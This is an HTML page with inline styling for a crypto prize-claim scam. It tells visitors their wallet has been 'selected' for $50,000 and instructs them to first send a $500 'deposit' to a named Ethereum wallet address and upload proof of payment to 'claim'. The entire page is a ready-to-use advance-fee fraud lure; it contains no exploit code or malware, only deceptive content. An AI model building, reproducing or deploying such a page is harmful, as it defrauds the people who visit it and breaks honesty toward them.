<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CONGRATULATION</title>
    <link rel="stylesheet" href="qualify.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
    <link href='https://fonts.googleapis.com/css?family=Poppins' rel='stylesheet'>
    <link rel="icon" href="images/newpics.png">
</head>
<body>
<div class="congratulation-area text-center mt-5">
    <div class="container">
        <div class="congratulation-wrapper">
            <div class="congratulation-contents center-text">
                <div class="congratulation-contents-icon">
                    <i class="fas fa-check"></i>
                    <i class="fa-sharp fa-solid fa-trophy-star fa-flip fa-xl" style="color: #18e240;"></i>
                </div>
                <h4 class="congratulation-contents-title"> Congratulations!!! </h4>
                <p class="congratulation-contents-para"> Your wallet have been selected for the sum of $50,000 to be credited to your crypto address</p>
                <h1>Steps to claim:</h1>
                <p>1. You have to make a deposit 1% of your winning, $500 to this wallet address <strong>(0x1080584d8521E58bDCa21484cCc42D5D5D3D68a1)</strong>.</p>
                <p>2. Upload the screenshot of your transcation and click claim.</p>
                <p>3.Click claim after uploading your receipt</p>
                <br>
                <form action="">
                <div class="btn-wrapper mt-4">
                    <a href="upload.html" class="cmn-btn btn-bg-1">Upload</a>
                </div>
                <br>
                    <div class="btn-wrapper mt-4">
                    <a href="index.html" class="cmn-btn btn-bg-1">Claim</a>
                </form>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Congratulations area end -->

        <!--CSS start-->
                    <style>
         h1{
    color: #67beb0;
    text-align: center;
    font-size: large;
    width: 30%;
    font-family: 'Times New Roman', Times, serif;
    width: 100%;
  }
     body{
            background-color: #2ec7c7;
        }
        .congratulation-wrapper {
        max-width: 550px;
        margin-inline: auto;
        -webkit-box-shadow: 0 0 20px #f3f3f3;
        box-shadow: 0 0 20px #f3f3f3;
        padding: 30px 20px;
        background-color: #fff;
        border-radius: 10px;
    }
    p{
        text-align: center;
        font-family: 'Poppins';font-size: 13px;
        text-decoration: solid;
    }
    h4{
        text-align: center;
    }

    a{
        align-items: center;
        padding: 50px;
        margin: 45%;
    }
    .congratulation-contents.center-text .congratulation-contents-icon {
        margin-inline: auto;
    }
    .congratulation-contents-icon {
        display: -webkit-box;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -ms-flex-align: center;
        align-items: center;
        -webkit-box-pack: center;
        -ms-flex-pack: center;
        justify-content: center;
        height: 100px;
        width: 100px;
        background-color: #65c18c;
        color: #fff;
        font-size: 50px;
        border-radius: 50%;
        margin-bottom: 30px;
    }
    .congratulation-contents-title {
        font-size: 32px;
        line-height: 36px;
        margin: -6px 0 0;
    }
    .congratulation-contents-para {
        font-size: 16px;
        line-height: 24px;
        margin-top: 15px;
    }
    .btn-wrapper {
        display: block;
    }
    .cmn-btn.btn-bg-1 {
        background: #16d1d1;
        color: #fff;
        border: 2px solid transparent;
        border-radius:3px;
        text-decoration: none;
        padding:5px;
    }
</style>
<!--CSS Ends-->
</body>
</html>